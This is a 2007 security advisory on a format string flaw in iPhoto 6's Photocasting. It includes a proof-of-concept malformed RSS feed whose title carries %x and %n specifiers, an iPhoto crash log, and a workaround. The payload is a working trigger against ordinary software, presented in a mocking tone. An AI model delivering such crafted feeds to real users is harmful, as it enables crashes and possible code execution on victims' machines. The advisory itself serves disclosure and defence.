SecurityvulnsSECURITYVULNS:DOC:15584DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
DMA[2007-0104a] - 'iLife iPhoto Photocasing Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: 'iLife 06 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0104a].txt
http://www.apple.com/ilife/iphoto/features/photocasting.html
http://projects.info-pull.com/moab/MOAB-04-01-2007.html
Description:
Rebuilt for blazing performance, iPhoto makes sharing photos faster, simpler, and cooler than
ever before. It adds eye-opening features to the ones you already love, including Photocasting,
support for up to 250,000 photos, easy publishing to the web, special effects, and new custom
cards and calendars. In essence iPhoto lets you spread smiles far and wide.
As easily as you can create a new photo album you can share it with friends and family thousands
of miles away. A new feature in iPhoto 6, Photocasting allows .Mac members to share albums with
anyone, anywhere. Say you have new photos of little Johny Pwnerseed. Place the photos you'd like
to share in an album called "Johny Pwnerseed's Latest Pics.", then click "Photocast this Album".
iPhoto publishes the album, and others can subscribe to it by clicking a link in an email you
send.
But here's where the real fun begins. If you create a malformed XML file you can simulate the
photocasting functionality in iPhoto 6 and use it to trigger a format string vulnerability. Once
Aunt Sophia subscribes, the fake photos feed is automatically download into a "Johny Pwnerseed's
Latest Pics" album that instantly triggers a format string write via %n.
We're talking beautiful, full-res pwnage. Aunt Sophia is pretty much screwed if you are able to
properly format your payload.
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
<channel>
<title>%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n.%n.%n.%n.%n.%n</title>
<item>
<title>Welcome to Pwndertino!</title>
<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg
</aw:image>
</item>
</channel>
</rss>
Host Name: Aunt-Sophias-computer
Date/Time: 2006-12-04 19:52:51.035 -0500
OS Version: 10.4.8 (Build 8L2127)
Report Version: 4
Command: iPhoto
Path: /Applications/iPhoto.app/Contents/MacOS/iPhoto
Parent: WindowServer [83]
Version: 6.0.5 (6.0.5)
Build Version: 2
Project Name: iPhotoProject
Source Version: 3160000
PID: 438
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00389ddc
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x92678e6c +[NSString localizedStringWithFormat:] + 129
6 com.apple.iPhoto 0x0002ae3a 0x1000 + 171578
7 com.apple.iPhoto 0x0031298f 0x1000 + 3217807
Workaround:
Unregister the iphoto:// URL handler with RCDefaultsApp
Check out Landon's website⦠he has been on the ball the last few days.
http://landonf.bikemonkey.org/
He has also set aside a google group for MOAB issues.
http://groups-beta.google.com/group/moabfixes?hl=en
http://www.apple.com/support/security/
http://docs.info.apple.com/article.html?artnum=61798